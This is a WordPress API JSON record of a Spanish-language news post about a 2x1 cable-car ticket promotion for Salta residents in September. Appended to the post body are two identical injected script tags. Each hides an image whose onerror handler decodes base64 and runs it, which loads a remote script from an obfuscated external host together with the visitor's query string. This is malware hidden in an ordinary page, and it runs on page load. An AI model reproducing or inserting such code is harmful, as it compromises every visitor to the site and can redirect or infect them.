{"id":4385,"date":"2024-09-05T09:46:33","date_gmt":"2024-09-05T12:46:33","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4385"},"modified":"2025-08-13T23:49:09","modified_gmt":"2025-08-14T02:49:09","slug":"teleferico-san-bernardo-extiende-la-promo-saltenos-por-el-mes-de-septiembre","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4385","title":{"rendered":"Telef\u00e9rico San Bernardo extiende la \u00abPromo Salte\u00f1os\u00bb por el mes de septiembre"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-000e62138f42d3a8c2d0fb5a37d6f585\" style=\"background-color:#920444\"><em>Esta iniciativa invita a los residentes de la provincia de Salta a disfrutar de un beneficio del 2&#215;1 en la compra de tickets (ida y vuelta) durante todo el mes de septiembre.<\/em><\/h3>\n\n\n\n<p>Telef\u00e9rico San Bernardo extendi\u00f3 la \u00abPromo Salte\u00f1os\u00bb, un beneficio imperdible que invita a los residentes de la provincia de Salta a disfrutar de un 2&#215;1 en la compra de tickets con tarifa provincial adultos (ida y vuelta), v\u00e1lida durante todo el mes de septiembre.<\/p>\n\n\n\n<p>Esta iniciativa busca acercar a los salte\u00f1os a uno de los lugares tur\u00edsticos m\u00e1s emblem\u00e1ticos de la ciudad, permiti\u00e9ndoles redescubrir la belleza de Salta desde las alturas y vivir una experiencia \u00fanica a un precio accesible.<\/p>\n\n\n\n<p>Para acceder a la \u00abPromo Salte\u00f1os\u00bb, los residentes de la provincia deber\u00e1n presentar su DNI en la boleter\u00eda del Telef\u00e9rico San Bernardo, de lunes a domingo de 9 a 19 horas, acreditando domicilio en Salta. El beneficio es v\u00e1lido para compras realizadas en boleter\u00eda y no es acumulable con otras promociones o descuentos.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/teleferico-san-bernardo-extiende-la-promo-saltenios-por-el-mes-de-septiembre-97585\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Esta iniciativa invita a los residentes de la provincia de Salta a disfrutar de un beneficio del 2&#215;1 en la compra de tickets (ida y vuelta) durante todo el mes de septiembre. Telef\u00e9rico San Bernardo extendi\u00f3 la \u00abPromo Salte\u00f1os\u00bb, un beneficio imperdible que invita a los residentes de la provincia de Salta a disfrutar de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4386,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[4,17],"tags":[],"class_list":{"0":"post-4385","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-paisajes","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4385"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4385"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4385\/revisions"}],"predecessor-version":[{"id":6689,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4385\/revisions\/6689"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4386"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4385"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4385"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4385"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}